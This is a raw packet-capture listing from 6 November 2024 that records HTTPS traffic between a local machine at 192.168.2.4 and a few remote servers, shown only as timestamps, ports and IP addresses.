                                                                                                                                                                                                            Nov 6, 2024 06:28:44.162393093 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.162417889 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.162436962 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.162451982 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.162472963 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.211040974 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.279057026 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.279067993 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.279119015 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.279139042 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.279194117 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.396517992 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.396528959 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.396573067 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.396601915 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.396617889 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.396631002 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.396676064 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.513822079 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.513849020 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.513956070 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.513983011 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.513993979 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.514131069 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.514136076 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.514183998 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.630862951 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.630883932 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.630954981 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.630986929 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.631015062 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.631031990 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.748192072 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.748212099 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.748265028 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.748296976 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.748337030 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.794565916 CET49740443192.168.2.4142.250.186.132
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.794610023 CET44349740142.250.186.132192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.794668913 CET49740443192.168.2.4142.250.186.132
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.795239925 CET49740443192.168.2.4142.250.186.132
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.795262098 CET44349740142.250.186.132192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.865268946 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.865287066 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.865360022 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.865391016 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.865432024 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.982099056 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.982117891 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.982219934 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.982258081 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.982300997 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.099159956 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.099180937 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.099225044 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.099253893 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.099277973 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.099297047 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.141051054 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.141072989 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.141134977 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.141160011 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.141211987 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.217086077 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.217108011 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.217160940 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.217184067 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.217209101 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.217233896 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.333986998 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.334006071 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.334049940 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.334074974 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.334100008 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.334119081 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.451531887 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.451550961 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.451632977 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.451647043 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.451688051 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.492494106 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.492511034 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.492604017 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.492624998 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.492667913 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.568892956 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.568914890 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.569024086 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.569044113 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.569088936 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.581191063 CET49741443192.168.2.4184.28.90.27
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.581232071 CET44349741184.28.90.27192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.581341982 CET49741443192.168.2.4184.28.90.27
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.582902908 CET49741443192.168.2.4184.28.90.27
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.582915068 CET44349741184.28.90.27192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.666532040 CET44349740142.250.186.132192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.666850090 CET49740443192.168.2.4142.250.186.132
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.666865110 CET44349740142.250.186.132192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.667742968 CET44349740142.250.186.132192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.667838097 CET49740443192.168.2.4142.250.186.132
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.685343027 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.685360909 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.685420990 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.685441971 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.685496092 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.726866961 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.726883888 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.726943970 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.726959944 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.727003098 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.802505016 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.802521944 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.802582979 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.802596092 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.802645922 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.919258118 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.919279099 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.919347048 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.919363022 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.919409990 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.961533070 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.961550951 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.961612940 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.961623907 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.961667061 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.963896036 CET49740443192.168.2.4142.250.186.132
                                                                                                                                                                                                            Nov 6, 2024 06:28:45.964013100 CET44349740142.250.186.132192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.014332056 CET49740443192.168.2.4142.250.186.132
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.014353991 CET44349740142.250.186.132192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.036804914 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.036825895 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.036916971 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.036942959 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.036993027 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.060952902 CET49740443192.168.2.4142.250.186.132
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.078443050 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.078463078 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.078506947 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.078511953 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.078558922 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.154090881 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.154122114 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.154160976 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.154180050 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.154206991 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.154227972 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.196217060 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.196238041 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.196290970 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.196309090 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.196329117 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.196352005 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.271456957 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.271473885 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.271568060 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.271579981 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.271625996 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.323069096 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.323091984 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.323152065 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.323157072 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.323194981 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.388653994 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.388670921 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.388708115 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.388712883 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.388731003 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.388753891 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.439400911 CET44349741184.28.90.27192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.439467907 CET49741443192.168.2.4184.28.90.27
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.440781116 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.440798044 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.440840960 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.440860987 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.440874100 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.440912008 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.446408987 CET49741443192.168.2.4184.28.90.27
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.446418047 CET44349741184.28.90.27192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.446644068 CET44349741184.28.90.27192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.486617088 CET49741443192.168.2.4184.28.90.27
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.505510092 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.505528927 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.505589962 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.505609989 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.505657911 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.529794931 CET49741443192.168.2.4184.28.90.27
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.557287931 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.557331085 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.557349920 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.557358980 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.557394028 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.557423115 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.571331978 CET44349741184.28.90.27192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.622773886 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.622788906 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.622853994 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.622860909 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.622903109 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.674309969 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.674325943 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.674381018 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.674398899 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.674422026 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.674443007 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.675158978 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.675177097 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.675237894 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.675241947 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.675278902 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.774113894 CET44349741184.28.90.27192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.774199009 CET44349741184.28.90.27192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.774280071 CET49741443192.168.2.4184.28.90.27
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.789464951 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.789491892 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.789534092 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.789555073 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.789575100 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.789592981 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.792238951 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.792257071 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.792327881 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.792342901 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.792380095 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.857314110 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.857332945 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.857537985 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.857558012 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.857601881 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.908663988 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.908680916 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.908819914 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.908845901 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.908885956 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.909723043 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.909739017 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.909794092 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.909806013 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:46.909843922 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.039897919 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.039915085 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.039968014 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.039975882 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.039999008 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.040024996 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.040057898 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.041379929 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.042203903 CET49741443192.168.2.4184.28.90.27
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.042231083 CET44349741184.28.90.27192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.042243004 CET49741443192.168.2.4184.28.90.27
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.042248964 CET44349741184.28.90.27192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.091867924 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.091888905 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.091955900 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.091963053 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.092001915 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.153966904 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.153985977 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.154016018 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.154021025 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.154045105 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.154067039 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.155421972 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.155437946 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.155473948 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.155478954 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.155502081 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.155523062 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.209302902 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.209323883 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.209397078 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.209422112 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.209460020 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.262063026 CET49742443192.168.2.4184.28.90.27
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.262120008 CET44349742184.28.90.27192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.262291908 CET49742443192.168.2.4184.28.90.27
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.262831926 CET49742443192.168.2.4184.28.90.27
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.262847900 CET44349742184.28.90.27192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.271065950 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.271085978 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.271126986 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.271147966 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.271173000 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.271188974 CET49736443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.272109032 CET4434973654.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:28:47.272129059 CET4434973654.91.146.110192.168.2.4
